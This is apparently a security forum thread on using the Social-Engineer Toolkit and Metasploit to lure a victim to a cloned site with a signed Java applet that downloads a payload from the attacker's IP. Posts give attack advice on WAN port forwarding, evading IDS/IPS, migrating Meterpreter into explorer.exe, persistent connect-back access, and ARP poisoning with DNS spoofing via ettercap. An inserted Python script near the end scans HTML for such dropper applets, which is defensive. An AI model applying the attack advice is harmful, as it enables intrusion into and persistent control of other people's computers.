If this were to be done between two consenting parties via WAN, but the ISP, IPS and/or IDS do detect the signatures of flying shells and terminate them automatically by policy, then it would be sensible to encrypt or tunnel the connection. Can Metasploit perform such a task?
Sorry if this sounds a little "noobish"; I'm familiar with Metasploit, but only as far as the basics go.
OK Folks!!!
I used this method with my PC and I have modified the router to forward the port in order to use my local IP address to exploit the PCs outside my network.
I made a test and it works fine!!!
So now the question is: how can we keep the connection alive when we are inside the remote PC?
I mean, in order to avoid the social engineering of asking to make a connection with IE or Firefox every time, is it possible to upload software to the remote PC that can start the connection with mine whenever I like?
Thanks
There are literally countless ways to preserve a connection after obtaining a shell. Check out chapter 11 in the Metasploit Unleashed guide:
Metasploit Unleashed - Mastering the Framework
Heya there guy, your problem is you're going to:
http://ip:55555
It will initiate the payload second-stage downloader because you're initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to set up the fake website, so you would browse http://ip instead, not http://ip:55555. If you need the SET web server to be on a different port, edit config/set_config and change WEB_PORT=80 to something different.
I hope that helps!
ReL
I can work with you on changing that, send me a PM on IRC (rel1k)
Utram, by default SET binds to whatever interface is used to connect to the outbound internet (specifically google). If that is different from your externally facing interface, you can turn auto detect off through config/set_config: there is an AUTO_DETECT=ON flag that you change to AUTO_DETECT=OFF. Once that occurs, you can manually set your listening IP address through that!
Hope that helps.
ReL
The payloads themselves are obfuscated through encoding, so IDS/IPS shouldn't pick them up; however, if it's a HIPS-based solution, anything new that hasn't executed a socket connection back may be suspicious. I would recommend utilizing Meterpreter, as the communications back and forth are done via SSL.
What ends up happening (if I understand you right) is that once the command shell or reverse Meterpreter or whatever is initiated, it's running under the same memory space and process as IEXPLORER.EXE. If the victim closes his or her browser, the thread is then terminated, and hence the closing of the connection. I would recommend utilizing Meterpreter in this instance because as soon as you get that connection, you can type "ps", look for something like explorer.exe or something that is a stable Windows process, and type "migrate <process id>". This will allow you to migrate off of the iexplorer memory address space, and if the victim closes it, the connection will still remain open.
You can also use a persistent Meterpreter instance where Meterpreter will connect back on specific intervals if the connection is lost. Check out Metasploit Unleashed - Mastering the Framework; it has some info on getting a persistent Meterpreter console. I also believe a Ruby script was created to help aid with this now.
Hope that helps!
ReL
Last edited by Archangel-Amael; 03-09-2010 at 11:36 PM.
Hi all,
First off, thanks for this great tutorial pureh@te. I have followed this and have managed to create a cloned site and send an e-mail to my victim laptop (XP SP3); I click the link and the Java applet loads. I want to try and take this a step further. I have now opened up ettercap, selected both my victim machine and my router, and then ran ARP poisoning. I have also configured my dns.spoof (* A 10.1.1.3) to redirect all to my cloned site. This works, but then the Java applet does not load. Any ideas on how to fix this?
Many thanks in advance
How did you get this to work? I forwarded all ports (80, 4444, 8080, and 8081) to my local IP and was still unable to get this to work. The problem is that the source code in the cloned website points to a local IP: <applet width="1" height="1" code="Java.class" archive="Signed_Update.jar"><param name="WIN" value="http://192.168.1.3/fkKyej0bY.exe"><param name="MAC" value="http://192.168.1.3/mac.bin">
Over a WAN this obviously won't work. Is there a way this can be changed?
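The applet tag quoted above is also what a defender sees when reviewing a captured or saved copy of a cloned page: a tiny signed applet whose WIN/MAC parameters point at executables. As an added example (not from this thread or from SET), the Python script below scans HTML for applet tags whose parameters fetch executables and reports whether each download host is a private or public address; the sample HTML is constructed to mirror the quoted tag.

```python
"""Flag Java applet tags whose <param> values pull executables from saved HTML.

Added defender-side example; SAMPLE below is constructed, not captured.
"""
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# File extensions a signed applet dropper typically hands to the OS
SUSPECT_EXT = (".exe", ".bin", ".jar", ".dll", ".scr")


class AppletScanner(HTMLParser):
    """Collect each <applet> together with the <param> tags nested in it."""

    def __init__(self):
        super().__init__()
        self.applets = []       # one dict per applet: code, archive, params
        self._current = None    # applet currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)         # HTMLParser lowercases tag/attr names, not values
        if tag == "applet":
            self._current = {"code": a.get("code"), "archive": a.get("archive"), "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def classify_host(url):
    """Return 'private', 'public' or 'unknown' for the host part of a URL."""
    host = urlparse(url).hostname
    if not host:
        return "unknown"
    try:
        return "private" if ip_address(host).is_private else "public"
    except ValueError:
        return "public"         # a DNS name rather than a literal IP


def find_dropper_applets(html):
    """Return one finding per applet parameter whose value ends in SUSPECT_EXT."""
    parser = AppletScanner()
    parser.feed(html)
    findings = []
    for ap in parser.applets:
        for name, value in ap["params"].items():
            if value.lower().endswith(SUSPECT_EXT):
                findings.append({"archive": ap["archive"], "param": name,
                                 "url": value, "host": classify_host(value)})
    return findings


# Constructed sample modelled on the tag quoted in the post above
SAMPLE = ('<html><body><applet width="1" height="1" code="Java.class" archive="Signed_Update.jar">'
          '<param name="WIN" value="http://192.168.1.3/fkKyej0bY.exe">'
          '<param name="MAC" value="http://192.168.1.3/mac.bin"></applet></body></html>')

if __name__ == "__main__":
    for finding in find_dropper_applets(SAMPLE):
        print(finding)
```

A private-range host in the finding is the same symptom the poster ran into from the other side: a page served to WAN clients that still references an internal address.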
It will work fine, you need to add your public IP when creating the fake site.
Ok I got it. I had to go into the SET config and disable auto detect IP.
Thanks,